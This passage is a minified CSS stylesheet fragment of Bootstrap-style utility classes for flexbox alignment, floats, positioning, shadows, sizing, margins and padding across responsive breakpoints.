!important}.align-self-start{align-self:flex-start !important}.align-self-end{align-self:flex-end !important}.align-self-center{align-self:center !important}.align-self-baseline{align-self:baseline !important}.align-self-stretch{align-self:stretch !important}@media(min-width: 576px){.flex-sm-row{flex-direction:row !important}.flex-sm-column{flex-direction:column !important}.flex-sm-row-reverse{flex-direction:row-reverse !important}.flex-sm-column-reverse{flex-direction:column-reverse !important}.flex-sm-wrap{flex-wrap:wrap !important}.flex-sm-nowrap{flex-wrap:nowrap !important}.flex-sm-wrap-reverse{flex-wrap:wrap-reverse !important}.flex-sm-fill{flex:1 1 auto !important}.flex-sm-grow-0{flex-grow:0 !important}.flex-sm-grow-1{flex-grow:1 !important}.flex-sm-shrink-0{flex-shrink:0 !important}.flex-sm-shrink-1{flex-shrink:1 !important}.justify-content-sm-start{justify-content:flex-start !important}.justify-content-sm-end{justify-content:flex-end !important}.justify-content-sm-center{justify-content:center !important}.justify-content-sm-between{justify-content:space-between !important}.justify-content-sm-around{justify-content:space-around !important}.align-items-sm-start{align-items:flex-start !important}.align-items-sm-end{align-items:flex-end !important}.align-items-sm-center{align-items:center !important}.align-items-sm-baseline{align-items:baseline !important}.align-items-sm-stretch{align-items:stretch !important}.align-content-sm-start{align-content:flex-start !important}.align-content-sm-end{align-content:flex-end !important}.align-content-sm-center{align-content:center !important}.align-content-sm-between{align-content:space-between !important}.align-content-sm-around{align-content:space-around !important}.align-content-sm-stretch{align-content:stretch !important}.align-self-sm-auto{align-self:auto !important}.align-self-sm-start{align-self:flex-start !important}.align-self-sm-end{align-self:flex-end !important}.align-self-sm-center{align-self:center !important}.align-self-sm-baseline{align-self:baseline !important}.align-self-sm-stretch{align-self:stretch !important}}@media(min-width: 768px){.flex-md-row{flex-direction:row !important}.flex-md-column{flex-direction:column !important}.flex-md-row-reverse{flex-direction:row-reverse !important}.flex-md-column-reverse{flex-direction:column-reverse !important}.flex-md-wrap{flex-wrap:wrap !important}.flex-md-nowrap{flex-wrap:nowrap !important}.flex-md-wrap-reverse{flex-wrap:wrap-reverse !important}.flex-md-fill{flex:1 1 auto !important}.flex-md-grow-0{flex-grow:0 !important}.flex-md-grow-1{flex-grow:1 !important}.flex-md-shrink-0{flex-shrink:0 !important}.flex-md-shrink-1{flex-shrink:1 !important}.justify-content-md-start{justify-content:flex-start !important}.justify-content-md-end{justify-content:flex-end !important}.justify-content-md-center{justify-content:center !important}.justify-content-md-between{justify-content:space-between !important}.justify-content-md-around{justify-content:space-around !important}.align-items-md-start{align-items:flex-start !important}.align-items-md-end{align-items:flex-end !important}.align-items-md-center{align-items:center !important}.align-items-md-baseline{align-items:baseline !important}.align-items-md-stretch{align-items:stretch !important}.align-content-md-start{align-content:flex-start !important}.align-content-md-end{align-content:flex-end !important}.align-content-md-center{align-content:center !important}.align-content-md-between{align-content:space-between !important}.align-content-md-around{align-content:space-around !important}.align-content-md-stretch{align-content:stretch !important}.align-self-md-auto{align-self:auto !important}.align-self-md-start{align-self:flex-start !important}.align-self-md-end{align-self:flex-end !important}.align-self-md-center{align-self:center !important}.align-self-md-baseline{align-self:baseline !important}.align-self-md-stretch{align-self:stretch !important}}@media(min-width: 992px){.flex-lg-row{flex-direction:row !important}.flex-lg-column{flex-direction:column !important}.flex-lg-row-reverse{flex-direction:row-reverse !important}.flex-lg-column-reverse{flex-direction:column-reverse !important}.flex-lg-wrap{flex-wrap:wrap !important}.flex-lg-nowrap{flex-wrap:nowrap !important}.flex-lg-wrap-reverse{flex-wrap:wrap-reverse !important}.flex-lg-fill{flex:1 1 auto !important}.flex-lg-grow-0{flex-grow:0 !important}.flex-lg-grow-1{flex-grow:1 !important}.flex-lg-shrink-0{flex-shrink:0 !important}.flex-lg-shrink-1{flex-shrink:1 !important}.justify-content-lg-start{justify-content:flex-start !important}.justify-content-lg-end{justify-content:flex-end !important}.justify-content-lg-center{justify-content:center !important}.justify-content-lg-between{justify-content:space-between !important}.justify-content-lg-around{justify-content:space-around !important}.align-items-lg-start{align-items:flex-start !important}.align-items-lg-end{align-items:flex-end !important}.align-items-lg-center{align-items:center !important}.align-items-lg-baseline{align-items:baseline !important}.align-items-lg-stretch{align-items:stretch !important}.align-content-lg-start{align-content:flex-start !important}.align-content-lg-end{align-content:flex-end !important}.align-content-lg-center{align-content:center !important}.align-content-lg-between{align-content:space-between !important}.align-content-lg-around{align-content:space-around !important}.align-content-lg-stretch{align-content:stretch !important}.align-self-lg-auto{align-self:auto !important}.align-self-lg-start{align-self:flex-start !important}.align-self-lg-end{align-self:flex-end !important}.align-self-lg-center{align-self:center !important}.align-self-lg-baseline{align-self:baseline !important}.align-self-lg-stretch{align-self:stretch !important}}@media(min-width: 1200px){.flex-xl-row{flex-direction:row !important}.flex-xl-column{flex-direction:column !important}.flex-xl-row-reverse{flex-direction:row-reverse !important}.flex-xl-column-reverse{flex-direction:column-reverse !important}.flex-xl-wrap{flex-wrap:wrap !important}.flex-xl-nowrap{flex-wrap:nowrap !important}.flex-xl-wrap-reverse{flex-wrap:wrap-reverse !important}.flex-xl-fill{flex:1 1 auto !important}.flex-xl-grow-0{flex-grow:0 !important}.flex-xl-grow-1{flex-grow:1 !important}.flex-xl-shrink-0{flex-shrink:0 !important}.flex-xl-shrink-1{flex-shrink:1 !important}.justify-content-xl-start{justify-content:flex-start !important}.justify-content-xl-end{justify-content:flex-end !important}.justify-content-xl-center{justify-content:center !important}.justify-content-xl-between{justify-content:space-between !important}.justify-content-xl-around{justify-content:space-around !important}.align-items-xl-start{align-items:flex-start !important}.align-items-xl-end{align-items:flex-end !important}.align-items-xl-center{align-items:center !important}.align-items-xl-baseline{align-items:baseline !important}.align-items-xl-stretch{align-items:stretch !important}.align-content-xl-start{align-content:flex-start !important}.align-content-xl-end{align-content:flex-end !important}.align-content-xl-center{align-content:center !important}.align-content-xl-between{align-content:space-between !important}.align-content-xl-around{align-content:space-around !important}.align-content-xl-stretch{align-content:stretch !important}.align-self-xl-auto{align-self:auto !important}.align-self-xl-start{align-self:flex-start !important}.align-self-xl-end{align-self:flex-end !important}.align-self-xl-center{align-self:center !important}.align-self-xl-baseline{align-self:baseline !important}.align-self-xl-stretch{align-self:stretch !important}}.float-left{float:left !important}.float-right{float:right !important}.float-none{float:none !important}@media(min-width: 576px){.float-sm-left{float:left !important}.float-sm-right{float:right !important}.float-sm-none{float:none !important}}@media(min-width: 768px){.float-md-left{float:left !important}.float-md-right{float:right !important}.float-md-none{float:none !important}}@media(min-width: 992px){.float-lg-left{float:left !important}.float-lg-right{float:right !important}.float-lg-none{float:none !important}}@media(min-width: 1200px){.float-xl-left{float:left !important}.float-xl-right{float:right !important}.float-xl-none{float:none !important}}.user-select-all{user-select:all !important}.user-select-auto{user-select:auto !important}.user-select-none{user-select:none !important}.overflow-auto{overflow:auto !important}.overflow-hidden{overflow:hidden !important}.position-static{position:static !important}.position-relative{position:relative !important}.position-absolute{position:absolute !important}.position-fixed{position:fixed !important}.position-sticky{position:sticky !important}.fixed-top{position:fixed;top:0;right:0;left:0;z-index:1030}.fixed-bottom{position:fixed;right:0;bottom:0;left:0;z-index:1030}@supports(position: sticky){.sticky-top{position:sticky;top:0;z-index:1020}}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;overflow:visible;clip:auto;white-space:normal}.shadow-sm{box-shadow:0 .125rem .25rem rgba(0,0,0,.075) !important}.shadow{box-shadow:0 .5rem 1rem rgba(0,0,0,.15) !important}.shadow-lg{box-shadow:0 1rem 3rem rgba(0,0,0,.175) !important}.shadow-none{box-shadow:none !important}.w-25{width:25% !important}.w-50{width:50% !important}.w-75{width:75% !important}.w-100{width:100% !important}.w-auto{width:auto !important}.h-25{height:25% !important}.h-50{height:50% !important}.h-75{height:75% !important}.h-100{height:100% !important}.h-auto{height:auto !important}.mw-100{max-width:100% !important}.mh-100{max-height:100% !important}.min-vw-100{min-width:100vw !important}.min-vh-100{min-height:100vh !important}.vw-100{width:100vw !important}.vh-100{height:100vh !important}.m-0{margin:0 !important}.mt-0,.my-0{margin-top:0 !important}.mr-0,.mx-0{margin-right:0 !important}.mb-0,.my-0{margin-bottom:0 !important}.ml-0,.mx-0{margin-left:0 !important}.m-1{margin:.25rem !important}.mt-1,.my-1{margin-top:.25rem !important}.mr-1,.mx-1{margin-right:.25rem !important}.mb-1,.my-1{margin-bottom:.25rem !important}.ml-1,.mx-1{margin-left:.25rem !important}.m-2{margin:.5rem !important}.mt-2,.my-2{margin-top:.5rem !important}.mr-2,.mx-2{margin-right:.5rem !important}.mb-2,.my-2{margin-bottom:.5rem !important}.ml-2,.mx-2{margin-left:.5rem !important}.m-3{margin:1rem !important}.mt-3,.my-3{margin-top:1rem !important}.mr-3,.mx-3{margin-right:1rem !important}.mb-3,.my-3{margin-bottom:1rem !important}.ml-3,.mx-3{margin-left:1rem !important}.m-4{margin:1.5rem !important}.mt-4,.my-4{margin-top:1.5rem !important}.mr-4,.mx-4{margin-right:1.5rem !important}.mb-4,.my-4{margin-bottom:1.5rem !important}.ml-4,.mx-4{margin-left:1.5rem !important}.m-5{margin:3rem !important}.mt-5,.my-5{margin-top:3rem !important}.mr-5,.mx-5{margin-right:3rem !important}.mb-5,.my-5{margin-bottom:3rem !important}.ml-5,.mx-5{margin-left:3rem !important}.m-6{margin:5rem !important}.mt-6,.my-6{margin-top:5rem !important}.mr-6,.mx-6{margin-right:5rem !important}.mb-6,.my-6{margin-bottom:5rem !important}.ml-6,.mx-6{margin-left:5rem !important}.m-7{margin:6rem !important}.mt-7,.my-7{margin-top:6rem !important}.mr-7,.mx-7{margin-right:6rem !important}.mb-7,.my-7{margin-bottom:6rem !important}.ml-7,.mx-7{margin-left:6rem !important}.p-0{padding:0 !important}.pt-0,.py-0{padding-top:0 !important}.pr-0,.px-0{padding-right:0 !important}.pb-0,.py-0{padding-bottom:0 !important}.pl-0,.px-0{padding-left:0 !important}.p-1{padding:.25rem !important}.pt-1,.py-1{padding-top:.25rem !important}.pr-1,.px-1{padding-right:.25rem !important}.pb-1,.py-1{padding-bottom:.25rem !important}.pl-1,.px-1{padding-left:.25rem !important}.p-2{padding:.5rem !important}.pt-2,.py-2{padding-top:.5rem !important}.pr-2,.px-2{padding-right:.5rem !important}.pb-2,.py-2{padding-bottom:.5rem !important}.pl-2,.px-2{padding-left:.5rem !important}.p-3{padding:1rem !important}.pt-3,.py-3{padding-top:1rem !important}.pr-3,.px-3{padding-right:1rem !important}.pb-3,.py-3{padding-bottom:1rem !important}.pl-3,.px-3{padding-left:1rem !important}.p-4{padding:1.5rem !important}.pt-4,.py-4{padding-top:1.5rem !important}.pr-4,.px-4{padding-right:1.5rem !important}.pb-4,.py-4{padding-bottom:1.5rem !important}.pl-4,.px-4{padding-left:1.5rem !important}.p-5{padding:3rem !important}.pt-5,.py-5{padding-top:3rem !important}.pr-5,.px-5{padding-right:3rem !important}.pb-5,.py-5{padding-bottom:3rem !important}.pl-5,.px-5{padding-left:3rem !important}.p-6{padding:5rem !important}.pt-6,.py-6{padding-top:5rem !important}.pr-6,.px-6{padding-right:5rem !important}.pb-6,.py-6{padding-bottom:5rem !important}.pl-6,.px-6{padding-left:5rem !important}.p-7{padding:6rem !important}.pt-7,.py-7{padding-top:6rem !important}.pr-7,.px-7{padding-right:6rem !important}.pb-7,.py-7{padding-bottom:6rem !important}.pl-7,.px-7{padding-left:6rem !important}.m-n1{margin:-0.25rem !important}.mt-n1,.my-n1{margin-top:-0.25rem !important}.mr-n1,.mx-n1{margin-right:-0.25rem !important}.mb-n1,.my-n1{margin-bottom:-0.25rem !important}.ml-n1,.mx-n1{margin-left:-0.25rem !important}.m-n2{margin:-0.5rem !important}.mt-n2,.my-n2{margin-top:-0.5rem !important}.mr-n2,.mx-n2{margin-right:-0.5rem !important}.mb-n2,.my-n2{margin-bottom:-0.5rem !important}.ml-n2,.mx-n2{margin-left:-0.5rem !important}.m-n3{margin:-1rem !important}.mt-n3,.my-n3{margin-top:-1rem !important}.mr-n3,.mx-n3{margin-right:-1rem !important}.mb-n3,.my-n3{margin-bottom:-1rem !important}.ml-n3,.mx-n3{margin-left:-1rem !important}.m-n4{margin:-1.5rem !important}.mt-n4,.my-n4{margin-top:-1.5rem !important}.mr-n4,.mx-n4{margin-right:-1.5rem !important}.mb-n4,.my-n4{margin-bottom:-1.5rem !important}.ml-n4,.mx-n4{margin-left:-1.5rem !important}.m-n5{margin:-3rem !important}.mt-n5,.my-n5{margin-top:-3rem !important}.mr-n5,.mx-n5{margin-right:-3rem !important}.mb-n5,.my-n5{margin-bottom:-3rem !important}.ml-n5,.mx-n5{margin-left:-3rem !important}.m-n6{margin:-5rem !important}.mt-n6,.my-n6{margin-top:-5rem !important}.mr-n6,.mx-n6{margin-right:-5rem !important}.mb-n6,.my-n6{margin-bottom:-5rem !important}.ml-n6,.mx-n6{margin-left:-5rem !important}.m-n7{margin:-6rem !important}.mt-n7,.my-n7{margin-top:-6rem !important}.mr-n7,.mx-n7{margin-right:-6rem !important}.mb-n7,.my-n7{margin-bottom:-6rem !important}.ml-n7,.mx-n7{margin-left:-6rem !important}.m-auto{margin:auto !important}.mt-auto,.my-auto{margin-top:auto !important}.mr-auto,.mx-auto{margin-right:auto !important}.mb-auto,.my-auto{margin-bottom:auto !important}.ml-auto,.mx-auto{margin-left:auto !important}@media(min-width: 576px){.m-sm-0{margin:0 !important}.mt-sm-0,.my-sm-0{margin-top:0 !important}.mr-sm-0,.mx-sm-0{margin-right:0 !important}.mb-sm-0,.my-sm-0{margin-bottom:0 !important}.ml-sm-0,.mx-sm-0{margin-left:0 !important}.m-sm-1{margin:.25rem !important}.mt-sm-1,.my-sm-1{margin-top:.25rem !important}.mr-sm-1,.mx-sm-1{margin-right:.25rem !important}.mb-sm-1,.my-sm-1{margin-bottom:.25rem !important}.ml-sm-1,.mx-sm-1{margin-left:.25rem !important}.m-sm-2{margin:.5rem !important}.mt-sm-2,.my-sm-2{margin-top:.5rem !important}.mr-sm-2,.mx-sm-2{margin-right:.5rem !important}.mb-sm-2,.my-sm-2{margin-bottom:.5rem !important}.ml-sm-2,.mx-sm-2{margin-left:.5rem !important}.m-sm-3{margin:1rem !important}.mt-sm-3,.my-sm-3{margin-top:1rem !important}.mr-sm-3,.mx-sm-3{margin-right:1rem !important}.mb-sm-3,.my-sm-3{margin-bottom:1rem !important}.ml-sm-3,.mx-sm-3{margin-left:1rem !important}.m-sm-4{margin:1.5rem !important}.mt-sm-4,.my-sm-4{margin-top:1.5rem !important}.mr-sm-4,.mx-sm-4{margin-right:1.5rem !important}.mb-sm-4,.my-sm-4{margin-bottom:1.5rem !important}.ml-sm-4,.mx-sm-4{margin-left:1.5rem !important}.m-sm-5{margin:3rem !important}.mt-sm-5,.my-sm-5{margin-top:3rem !important}.mr-sm-5,.mx-sm-5{margin-right:3rem !important}.mb-sm-5,.my-sm-5{margin-bottom:3rem !important}.ml-sm-5,.mx-sm-5{margin-left:3rem !important}.m-sm-6{margin:5rem !important}.mt-sm-6,.my-sm-6{margin-top:5rem !important}.mr-sm-6,.mx-sm-6{margin-right:5rem !important}.mb-sm-6,.my-sm-6{margin-bottom:5rem !important}.ml-sm-6,.mx-sm-6{margin-left:5rem !important}.m-sm-7{margin:6rem !important}.mt-sm-7,.my-sm-7{margin-top:6rem !important}.mr-sm-7,.mx-sm-7{margin-right:6rem !important}.mb-sm-7,.my-sm-7{margin-bottom:6rem !important}.ml-sm-7,.mx-sm-7{margin-left:6rem !important}.p-sm-0{padding:0 !important}.pt-sm-0,.py-sm-0{padding-top:0 !important}.pr-sm-0,.px-sm-0{padding-right:0 !important}.pb-sm-0,.py-sm-0{padding-bottom:0 !important}.pl-sm-0,.px-sm-0{padding-left:0 !important}.p-sm-1{padding:.25rem !important}.pt-sm-1,.py-sm-1{padding-top:.25rem !important}.pr-sm-1,.px-sm-1{padding-right:.25rem !important}.pb-sm-1,.py-sm-1{padding-bottom:.25rem !important}.pl-sm-1,.px-sm-1{padding-left:.25rem !important}.p-sm-2{padding:.5rem !important}.pt-sm-2,.py-sm-2{padding-top:.5rem !important}.pr-sm-2,.px-sm-2{padding-right:.5rem !important}.pb-sm-2,.py-sm-2{padding-bottom:.5rem !important}.pl-sm-2,.px-sm-2{padding-left:.5rem !important}.p-sm-3{padding:1rem !important}.pt-sm-3,.py-sm-3{padding-top:1rem !important}.pr-sm-3,.px-sm-3{padding-right:1rem !important}.pb-sm-3,.py-sm-3{padding-bottom:1rem !important}.pl-sm-3,.px-sm-3{padding-left:1rem !important}.p-sm-4{padding:1.5rem !important}.pt-sm-4,.py-sm-4{padding-top:1.5rem !important}.pr-sm-4,.px-sm-4{padding-right:1.5rem !important}.pb-sm-4,.py-sm-4{padding-bottom:1.5rem !important}.pl-sm-4,.px-sm-4{padding-left:1.5rem !important}.p-sm-5{padding:3rem !important}.pt-sm-5,.py-sm-5{padding-top:3rem !important}.pr-sm-5,.px-sm-5{padding-right:3rem !important}.pb-sm-5,.py-sm-5{padding-bottom:3rem !important}.pl-sm-5,.px-sm-5{padding-left:3rem !important}.p-sm-6{padding:5rem !important}.pt-sm-6,.py-sm-6{padding-top:5rem !important}.pr-sm-6,.px-sm-6{padding-right:5rem !important}.pb-sm-6,.py-sm-6{padding-bottom:5rem !important}.pl-sm-6,.px-sm-6{padding-left:5rem !important}.p-sm-7{padding:6rem !important}.pt-sm-7,.py-sm-7{padding-top:6rem !important}.pr-sm-7,.px-sm-7{padding-right:6rem !important}.pb-sm-7,.py-sm-7{padding-bottom:6rem !important}.pl-sm-7,.px-sm-7{padding-left:6rem !important}.m-sm-n1{margin:-0.25rem !important}.mt-sm-n1,.my-sm-n1{margin-top:-0.25rem !important}.mr-sm-n1,.mx-sm-n1{margin-right:-0.25rem !important}.mb-sm-n1,.my-sm-n1{margin-bottom:-0.25rem !important}.ml-sm-n1,.mx-sm-n1{margin-left:-0.25rem !important}.m-sm-n2{margin:-0.5rem !important}.mt-sm-n2,.my-sm-n2{margin-top:-0.5rem !important}.mr-sm-n2,.mx-sm-n2{margin-right:-0.5rem !important}.mb-sm-n2,.my-sm-n2{margin-bottom:-0.5rem !important}.ml-sm-n2,.mx-sm-n2{margin-left:-0.5rem !important}.m-sm-n3{margin:-1rem !important}.mt-sm-n3,.my-sm-n3{margin-top:-1rem !important}.mr-sm-n3,.mx-sm-n3{margin-right:-1rem !important}.mb-sm-n3,.my-sm-n3{margin-bottom:-1rem !important}.ml-sm-n3,.mx-sm-n3{margin-left:-1rem !important}.m-sm-n4{margin:-1.5rem !important}.mt-sm-n4,.my-sm-n4{margin-top:-1.5rem !important}.mr-sm-n4,.mx-sm-n4{margin-right:-1.5rem !important}.mb-sm-n4,.my-sm-n4{margin-bottom:-1.5rem !important}.ml-sm-n4,.mx-sm-n4{margin-left:-1.5rem !important}.m-sm-n5{margin:-3rem !important}.mt-sm-n5,.my-sm-n5{margin-top:-3rem !important}.mr-sm-n5,.mx-sm-n5{margin-right:-3rem !important}.mb-sm-n5,.my-sm-n5{margin-bottom:-3rem !important}.ml-sm-n5,.mx-sm-n5{margin-left:-3rem !important}.m-sm-n6{margin:-5rem !important}.mt-sm-n6,.my-sm-n6{margin-top:-5rem !important}.mr-sm-n6,.mx-sm-n6{margin-right:-5rem !important}.mb-sm-n6,.my-sm-n6{margin-bottom:-5rem !important}.ml-sm-n6,.mx-sm-n6{margin-left:-5rem !important}.m-sm-n7{margin:-6rem !important}.mt-sm-n7,.my-sm-n7{margin-top:-6rem !important}.mr-sm-n7,.mx-sm-n7{margin-right:-6rem !important}.mb-sm-n7,.my-sm-n7{margin-bottom:-6rem !important}.ml-sm-n7,.mx-sm-n7{margin-left:-6rem !important}.m-sm-auto{margin:auto !important}.mt-sm-auto,.my-sm-auto{margin-top:auto !important}.mr-sm-auto,.mx-sm-auto{margin-right:auto !important}.mb-sm-auto,.my-sm-auto{margin-bottom:auto !important}.ml-sm-auto,.mx-sm-auto{margin-left:auto !important}}@media(min-width: 768px){.m-md-0{margin:0 !important}.mt-md-0,.my-md-0{margin-top:0 !important}.mr-md-0,.mx-md-0{margin-right:0 !important}.mb-md-0,.my-md-0{margin-bottom:0 !important}.ml-md-0,.mx-md-0{margin-left:0 !important}.m-md-1{margin:.25rem !important}.mt-md-1,.my-md-1{margin-top:.25rem !important}.mr-md-1,.mx-md-1{margin-right:.25rem !important}.mb-md-1,.my-md-1{margin-bottom:.25rem !important}.ml-md-1,.mx-md-1{margin-left:.25rem !important}.m-md-2{margin:.5rem !important}.mt-md-2,.my-md-2{margin-top:.5rem !important}.mr-md-2,.mx-md-2{margin-right:.5rem !important}.mb-md-2,.my-md-2{margin-bottom:.5rem !important}.ml-md-2,.mx-md-2{margin-left:.5rem !important}.m-md-3{margin:1rem !important}.mt-md-3,.my-md-3{margin-top:1rem !important}.mr-md-3,.mx-md-3{margin-right:1rem !important}.mb-md-3,.my-md-3{margin-bottom:1rem !important}.ml-md-3,.mx-md-3{margin-left:1rem !important}.m-md-4{margin:1.5rem !important}.mt-md-4,.my-md-4{margin-top:1.5rem !important}.mr-md-4,.mx-md-4{margin-right:1.5rem !important}.mb-md-4,.my-md-4{margin-bottom:1.5rem !important}.ml-md-4,.mx-md-4{margin-left:1.5rem !important}.m-md-5{margin:3rem !important}.mt-md-5,.my-md-5{margin-top:3rem !important}.mr-md-5,.mx-md-5{margin-right:3rem !important}.mb-md-5,.my-md-5{margin-bottom:3rem !important}.ml-md-5,.mx-md-5{margin-left:3rem !important}.m-md-6{margin:5rem !important}.mt-md-6,.my-md-6{margin-top:5rem !important}.mr-md-6,.mx-md-6{margin-right:5rem !important}.mb-md-6,.my-md-6{margin-bottom:5rem !important}.ml-md-6,.mx-md-6{margin-left:5rem !important}.m-md-7{margin:6rem !important}.mt-md-7,.my-md-7{margin-top:6rem !important}.mr-md-7,.mx-md-7{margin-right:6rem !important}.mb-md-7,.my-md-7{margin-bottom:6rem !important}.ml-md-7,.mx-md-7{margin-left:6rem !important}.p-md-0{padding:0 !important}.pt-md-0,.py-md-0{padding-top:0 !important}.pr-md-0,.px-md-0{padding-right:0 !important}.pb-md-0,.py-md-0{padding-bottom:0 !important}.pl-md-0,.px-md-0{padding-left:0 !important}.p-md-1{padding:.25rem !important}.pt-md-1,.py-md-1{padding-top:.25rem !important}.pr-md-1,.px-md-1{padding-right:.25rem !important}.pb-md-1,.py-md-1{padding-bottom:.25rem !important}.pl-md-1,.px-md-1{padding-left:.25rem !important}.p-md-2{padding:.5rem !important}.pt-md-2,.py-md-2{padding-top:.5rem !important}.pr-md-2,.px-md-2{padding-right:.5rem !important}.pb-md-2,.py-md-2{padding-bottom:.5rem !important}.pl-md-2,.px-md-2{padding-left:.5rem !important}.p-md-3{padding:1rem !important}.pt-md-3,.py-md-3{padding-top:1rem !important}.pr-md-3,.px-md-3{padding-right:1rem !important}.pb-md-3,.py-md-3{padding-bottom:1rem !important}.pl-md-3,.px-md-3{padding-left:1rem !important}.p-md-4{padding:1.5rem !important}.pt-md-4,.py-md-4{padding-top:1.5rem !important}.pr-md-4,.px-md-4{padding-right:1.5rem !important}.pb-md-4,.py-md-4{padding-bottom:1.5rem !important}.pl-md-4,.px-md-4{padding-left:1.5rem !important}.p-md-5{padding:3rem !important}.pt-md-5,.py-md-5{padding-top:3rem !important}.pr-md-5,.px-md-5{padding-right:3rem !important}.pb-md-5,.py-md-5{padding-bottom:3rem !important}.pl-md-5,.px-md-5{padding-left:3rem !important}.p-md-6{padding:5rem !important}.pt-md-6,.py-md-6{padding-top:5rem !important}.pr-md-6,.px-md-6{padding-right:5rem !important}.pb-md-6,.py-md-6{padding-bottom:5rem !important}.pl-md-6,.px-md-6{padding-left:5rem !important}.p-md-7{padding:6rem !important}.pt-md-7,.py-md-7{padding-top:6rem !important}.pr-md-7,.px-md-7{padding-right:6rem !important}.pb-md-7,.py-md-7{padding-bottom:6rem !important}.pl-md-7,.px-md-7{padding-left:6rem !important}.m-md-n1{margin:-0.25rem !important}.mt-md-n1,.my-md-n1{margin-top:-0.25rem !important}.mr-md-n1,.mx-md-n1{margin-right:-0.25rem !important}.mb-md-n1,.my-md-n1{margin-bottom:-0.25rem !important}.ml-md-n1,.mx-md-n1{margin-left:-0.25rem !important}.m-md-n2{margin:-0.5rem !important}.mt-md-n2,.my-md-n2{margin-top:-0.5rem !important}.mr-md-n2,.mx-md-n2{margin-right:-0.5rem !important}.mb-md-n2,.my-md-n2{margin-bottom:-0.5rem !important}.ml-md-n2,.mx-md-n2{margin-left:-0.5rem !important}.m-md-n3{margin:-1rem !important}.mt-md-n3,.my-md-n3{margin-top:-1rem !important}.mr-md-n3,.mx-md-n3{margin-right:-1rem !important}.mb-md-n3,.my-md-n3{margin-bottom:-1rem !important}.ml-md-n3,.mx-md-n3{margin-left:-1rem !important}.m-md-n4{margin:-1.5rem !important}.mt-md-n4,.my-md-n4{margin-top:-1.5rem !important}.mr-md-n4,.mx-md-n4{margin-right:-1.5rem !important}.mb-md-n4,.my-md-n4{margin-bottom:-1.5rem !important}.ml-md-n4,.mx-md-n4{margin-left:-1.5rem !important}.m-md-n5{margin:-3rem !important}.mt-md-n5,.my-md-n5{margin-top:-3rem !important}.mr-md-n5,.mx-md-n5{margin-right:-3rem !important}.mb-md-n5,.my-md-n5{margin-bottom:-3rem !important}.ml-md-n5,.mx-md-n5{margin-left:-3rem !important}.m-md-n6{margin:-5rem !important}.mt-md-n6,.my-md-n6{margin-top:-5rem !important}.mr-md-n6,.mx-md-n6{margin-right:-5rem !important}.mb-md-n6,.my-md-n6{margin-bottom:-5rem !important}.ml-md-n6,.mx-md-n6{margin-left:-5rem !important}.m-md-n7{margin:-6rem !important}.mt-md-n7,.my-md-n7{margin-top:-6rem !important}.mr-md-n7,.mx-md-n7{margin-right:-6rem !important}.mb-md-n7,.my-md-n7{margin-bottom:-6rem !important}.ml-md-n7,.mx-md-n7{margin-left:-6rem !important}.m-md-auto{margin:auto !important}.mt-md-auto,.my-md-auto{margin-top:auto !important}.mr-md-auto,.mx-md-auto{margin-right:auto !important}.mb-md-auto,.my-md-auto{margin-bottom:auto !important}.ml-md-auto,.mx-md-auto{margin-left:auto !important}}@media(min-width: 992px){.m-lg-0{margin:0 !important}.mt-lg-0,.my-lg-0{margin-top:0 !important}.mr-lg-0,.mx-lg-0{margin-right:0 !important}.mb-lg-0,.my-lg-0{margin-bottom:0 !important}.ml-lg-0,.mx-lg-0{margin-left:0 !important}.m-lg-1{margin:.25rem !important}.mt-lg-1,.my-lg-1{margin-top:.25rem !important}.mr-lg-1,.mx-lg-1{margin-right:.25rem !important}.mb-lg-1,.my-lg-1{margin-bottom:.25rem !important}.ml-lg-1,.mx-lg-1{margin-left:.25rem !important}.m-lg-2{margin:.5rem !important}.mt-lg-2,.my-lg-2{margin-top:.5rem !important}.mr-lg-2,.mx-lg-2{margin-right:.5rem !important}.mb-lg-2,.my-lg-2{margin-bottom:.5rem !important}.ml-lg-2,.mx-lg-2{margin-left:.5rem !important}.m-lg-3{margin:1rem !important}.mt-lg-3,.my-lg-3{margin-top:1rem !important}.mr-lg-3,.mx-lg-3{margin-right:1rem !important}.mb-lg-3,.my-lg-3{margin-bottom:1rem !important}.ml-lg-3,.mx-lg-3{margin-left:1rem !important}.m-lg-4{margin:1.5rem !important}.mt-lg-4,.my-lg-4{margin-top:1.5rem !important}.mr-lg-4,.mx-lg-4{margin-right:1.5rem !important}.mb-lg-4,.my-lg-4{margin-bottom:1.5rem !important}.ml-lg-4,.mx-lg-4{margin-left:1.5rem !important}.m-lg-5{margin:3rem !important}.mt-lg-5,.my-lg-5{margin-top:3rem !important}.mr-lg-5,.mx-lg-5{margin-right:3rem !important}.mb-lg-5,.my-lg-5{margin-bottom:3rem !important}.ml-lg-5,.mx-lg-5{margin-left:3rem !important}.m-lg-6{margin:5rem !important}.mt-lg-6,.my-lg-6{margin-top:5rem !important}.mr-lg-6,.mx-lg-6{margin-right:5rem !important}.mb-lg-6,.my-lg-6{margin-bottom:5rem !important}.ml-lg-6,.mx-lg-6{margin-left:5rem !important}.m-lg-7{margin:6rem !important}.mt-lg-7,.my-lg-7{margin-top:6rem !important}.mr-lg-7,.mx-lg-7{margin-right:6rem !important}.mb-lg-7,.my-lg-7{margin-bottom:6rem !important}.ml-lg-7,.mx-lg-7{margin-left:6rem !important}.p-lg-0{padding:0 !important}.pt-lg-0,.py-lg-0{padding-top:0 !important}.pr-lg-0,.px-lg-0{padding-right:0 !important}.pb-lg-0,.py-lg-0{padding-bottom:0 !important}.pl-lg-0,.px-lg-0{padding-left:0 !important}.p-lg-1{padding:.25rem !important}.pt-lg-1,.py-lg-1{padding-top:.25rem !important}.pr-lg-1,.px-lg-1{padding-right:.25rem !important}.pb-lg-1,.py-lg-1{padding-bottom:.25rem !important}.pl-lg-1,.px-lg-1{padding-left:.25rem !important}.p-lg-2{padding:.5rem !important}.pt-lg-2,.py-lg-2{padding-top:.5rem !important}.pr-lg-2,.px-lg-2{padding-right:.5rem !important}.pb-lg-2,.py-lg-2{padding-bottom:.5rem !important}.pl-lg-2,.px-lg-2{padding-left:.5rem !important}.p-lg-3{padding:1rem !important}.pt-lg-3,.py-lg-3{padding-top:1rem !important}.pr-lg-3,.px-lg-3{padding-right:1rem !important}.pb-lg-3,.py-lg-3{padding-bottom:1rem !important}.pl-lg-3,.px-lg-3{padding-left:1rem !important}.p-lg-4{padding:1.5rem !important}.pt-lg-4,.py-lg-4{padding-top:1.5rem !important}.pr-lg-4,.px-lg-4{padding-right:1.5rem !important}.pb-lg-4,.py-lg-4{padding-bottom:1.5rem 